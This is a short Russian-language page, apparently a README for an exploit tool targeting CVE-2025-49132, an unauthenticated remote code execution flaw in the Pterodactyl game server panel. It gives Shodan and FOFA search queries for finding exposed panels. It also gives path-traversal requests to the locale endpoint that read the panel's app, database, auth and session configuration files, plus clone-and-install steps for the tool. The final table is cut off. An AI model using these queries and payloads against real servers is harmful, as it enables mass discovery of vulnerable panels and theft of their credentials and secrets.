
Инструмент эксплуатации для CVE-2025-49132, критической неаутентифицированной RCE в панелях игровых серверов Pterodactyl. Включает запросы разведки и полезные нагрузки для авторизованного тестирования на проникновение.
Эксплойт для CVE-2025-49132 — критическая уязвимость удалённого выполнения кода без аутентификации, затрагивающая панель управления игровыми серверами Pterodactyl.
Критическая ACE-уязвимость в панели Pterodactyl, позволяющая неаутентифицированным удалённым злоумышленникам выполнять произвольный код — что потенциально приводит к полной компрометации системы.
Никакой аутентификации не требуется. Достаточно уязвимого экземпляра.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| Программное обеспечение | Статус |
|---|---|
| Pterodactyl Panel |